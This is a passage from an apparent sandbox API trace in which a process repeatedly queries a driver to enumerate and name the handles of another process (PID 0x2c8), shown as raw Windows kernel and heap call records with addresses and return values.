ReturnLength=0xfffff880052b3508) returned 0x0 [0223.470] ObfDereferenceObject (Object=0xfffffa800375adc0) returned 0x1 [0223.470] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.470] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.470] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.470] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0223.471] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.471] PsAcquireProcessExitSynchronization () returned 0x0 [0223.471] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.471] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800376fb90, HandleInformation=0x0) returned 0x0 [0223.471] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.471] PsReleaseProcessExitSynchronization () returned 0x2 [0223.471] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.471] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.471] ObfDereferenceObject (Object=0xfffffa800376fb90) returned 0x1 [0223.471] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.471] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.471] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.471] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xda, lpOverlapped=0x0) returned 1 [0223.471] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.471] PsAcquireProcessExitSynchronization () returned 0x0 [0223.471] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.471] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800256a710, HandleInformation=0x0) returned 0x0 [0223.471] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.471] PsReleaseProcessExitSynchronization () returned 0x2 [0223.472] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.472] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.472] ObfDereferenceObject (Object=0xfffffa800256a710) returned 0x12 [0223.472] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.472] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.472] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0223.472] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.472] PsAcquireProcessExitSynchronization () returned 0x0 [0223.472] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.472] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800378d950, HandleInformation=0x0) returned 0x0 [0223.472] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.472] PsReleaseProcessExitSynchronization () returned 0x2 [0223.472] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.472] ObQueryNameString (in: Object=0xfffffa800378d950, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.472] ObfDereferenceObject (Object=0xfffffa800378d950) returned 0x2 [0223.472] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.472] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.472] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0223.472] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.472] PsAcquireProcessExitSynchronization () returned 0x0 [0223.472] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.472] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800378dbf0, HandleInformation=0x0) returned 0x0 [0223.472] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.473] PsReleaseProcessExitSynchronization () returned 0x2 [0223.473] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.473] ObQueryNameString (in: Object=0xfffffa800378dbf0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.473] ObfDereferenceObject (Object=0xfffffa800378dbf0) returned 0x1 [0223.473] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.473] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.473] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.473] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0223.473] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.473] PsAcquireProcessExitSynchronization () returned 0x0 [0223.473] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.473] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800378ef20, HandleInformation=0x0) returned 0x0 [0223.473] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.473] PsReleaseProcessExitSynchronization () returned 0x2 [0223.473] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.473] ObQueryNameString (in: Object=0xfffffa800378ef20, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.473] ObfDereferenceObject (Object=0xfffffa800378ef20) returned 0x1 [0223.473] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.473] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.473] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.473] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0223.473] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.473] PsAcquireProcessExitSynchronization () returned 0x0 [0223.473] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.474] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003794c00, HandleInformation=0x0) returned 0x0 [0223.474] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.474] PsReleaseProcessExitSynchronization () returned 0x2 [0223.474] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.474] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.474] ObfDereferenceObject (Object=0xfffffa8003794c00) returned 0x1 [0223.474] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.474] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.474] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.474] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0223.474] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.474] PsAcquireProcessExitSynchronization () returned 0x0 [0223.474] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.474] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800379fdd0, HandleInformation=0x0) returned 0x0 [0223.474] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.474] PsReleaseProcessExitSynchronization () returned 0x2 [0223.474] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.474] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.474] ObfDereferenceObject (Object=0xfffffa800379fdd0) returned 0x1 [0223.474] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.474] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.474] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.474] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0223.474] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.474] PsAcquireProcessExitSynchronization () returned 0x0 [0223.474] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.475] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003270970, HandleInformation=0x0) returned 0x0 [0223.475] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.475] PsReleaseProcessExitSynchronization () returned 0x2 [0223.475] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.475] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.475] ObfDereferenceObject (Object=0xfffffa8003270970) returned 0x12 [0223.475] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.475] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.475] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.475] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.475] PsAcquireProcessExitSynchronization () returned 0x0 [0223.475] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.475] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036c5a20, HandleInformation=0x0) returned 0x0 [0223.475] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.475] PsReleaseProcessExitSynchronization () returned 0x2 [0223.475] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.475] ObQueryNameString (in: Object=0xfffffa80036c5a20, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.475] ObfDereferenceObject (Object=0xfffffa80036c5a20) returned 0x2 [0223.475] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.475] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.475] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0223.475] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.475] PsAcquireProcessExitSynchronization () returned 0x0 [0223.475] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.476] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800379ff20, HandleInformation=0x0) returned 0x0 [0223.476] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.476] PsReleaseProcessExitSynchronization () returned 0x2 [0223.476] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.476] ObQueryNameString (in: Object=0xfffffa800379ff20, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.476] ObfDereferenceObject (Object=0xfffffa800379ff20) returned 0x2 [0223.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.476] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.476] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.476] PsAcquireProcessExitSynchronization () returned 0x0 [0223.476] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.476] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800379a920, HandleInformation=0x0) returned 0x0 [0223.476] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.476] PsReleaseProcessExitSynchronization () returned 0x2 [0223.476] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.476] ObQueryNameString (in: Object=0xfffffa800379a920, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.476] ObfDereferenceObject (Object=0xfffffa800379a920) returned 0x2 [0223.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.477] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.477] PsAcquireProcessExitSynchronization () returned 0x0 [0223.477] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.477] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800380d9a0, HandleInformation=0x0) returned 0x0 [0223.477] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.477] PsReleaseProcessExitSynchronization () returned 0x2 [0223.477] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.477] ObQueryNameString (in: Object=0xfffffa800380d9a0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.477] ObfDereferenceObject (Object=0xfffffa800380d9a0) returned 0x2 [0223.477] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.477] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.477] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.477] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.477] PsAcquireProcessExitSynchronization () returned 0x0 [0223.477] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.477] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800380fe10, HandleInformation=0x0) returned 0x0 [0223.477] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.477] PsReleaseProcessExitSynchronization () returned 0x2 [0223.477] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.477] ObQueryNameString (in: Object=0xfffffa800380fe10, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.477] ObfDereferenceObject (Object=0xfffffa800380fe10) returned 0x2 [0223.477] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.478] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.478] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0223.478] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.478] PsAcquireProcessExitSynchronization () returned 0x0 [0223.478] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.478] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003815d20, HandleInformation=0x0) returned 0x0 [0223.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.478] PsReleaseProcessExitSynchronization () returned 0x2 [0223.478] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.478] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.478] ObfDereferenceObject (Object=0xfffffa8003815d20) returned 0x20 [0223.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.478] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.478] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0223.478] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.478] PsAcquireProcessExitSynchronization () returned 0x0 [0223.478] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.478] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003816ea0, HandleInformation=0x0) returned 0x0 [0223.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.478] PsReleaseProcessExitSynchronization () returned 0x2 [0223.478] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.478] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.478] ObfDereferenceObject (Object=0xfffffa8003816ea0) returned 0x12 [0223.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0223.479] PsLookupProcessByProcessId (in: 